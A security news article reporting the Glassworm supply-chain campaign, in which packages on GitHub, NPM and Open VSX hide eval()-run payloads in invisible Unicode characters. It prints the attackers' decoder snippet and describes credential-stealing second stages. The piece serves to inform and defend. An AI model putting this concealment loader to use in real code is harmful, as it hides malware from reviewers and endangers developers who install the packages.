Supply-chain attack uses invisible Unicode code to bypass detection
Security researchers from Aikido Security discovered a supply-chain attack using invisible Unicode code to conceal malicious functions in packages uploaded to GitHub, NPM, and Open VSX. The attack group, dubbed Glassworm, uploaded 151 malicious packages to GitHub from March 3 to March 9, 2026.
How the invisible code works
The malicious packages use Unicode characters from Public Use Areas (also called Public Use Access) that are invisible when viewed in editors, terminals, and code review interfaces. While most of the code appears normal, malicious functions and payloads are rendered using these invisible characters, making manual code reviews and traditional defenses ineffective.
The invisible Unicode characters represent every letter of the US alphabet when processed by computers but display as whitespace or blank lines to humans. JavaScript interpreters can read and execute these characters as normal code.
Technical implementation
In one analyzed package, attackers encoded a malicious payload using invisible characters. The code includes a decoder function that extracts the hidden bytes and passes them to eval():
const s = v => [...v].map(
w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
null
)
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));The backtick string passed to s() appears empty in viewers but contains invisible characters that decode to a full malicious payload. In previous incidents, decoded payloads fetched and executed second-stage scripts using Solana as a delivery channel to steal tokens, credentials, and secrets.
Attack characteristics
The malicious packages are particularly difficult to detect because:
- The visible portions of the code are high quality and realistic
- Surrounding changes include documentation tweaks, version bumps, small refactors, and bug fixes
- Changes are stylistically consistent with target projects
- Researchers suspect LLMs are used to generate convincingly legitimate packages
This Unicode technique was first used in 2024 to conceal malicious prompts fed to AI engines, and has since been adapted for traditional malware attacks. The 151 packages detected likely represent a small fraction of the campaign, as many have been deleted since initial upload.
📖 Read the full source: HN AI Agents
👀 See Also
Clawndom: A Security Hook for Claude Code to Block Vulnerable npm Packages
A developer built Clawndom, an open-source hook for Claude Code that checks npm packages against the OSV.dev vulnerability database before installation, blocking known vulnerable packages while maintaining agent autonomy.
Fake Claude Code site served trojan — detected by Windows Defender as Trojan:Win32/Kepavll!rfn
A typosquatting or ad-based site mimicking the official Claude Code website delivered a trojan detected as Trojan:Win32/Kepavll!rfn by Windows Defender. Reddit user warns others to verify URLs before running PowerShell install commands.
Claw Hub and Hugging Face hit with 575 malicious skill packages
Both Claw Hub and Hugging Face were compromised, hosting 575 malicious skill packages. Developers are warned to verify any skills they use from these platforms.
OpenClaw Security Approach Using LLM Router and zrok Private Sharing
A developer shares their approach to running OpenClaw and an LLM router inside a VM+Kubernetes environment with a single command, addressing security concerns by injecting API keys at the router level and using zrok for private sharing instead of traditional messaging app tokens.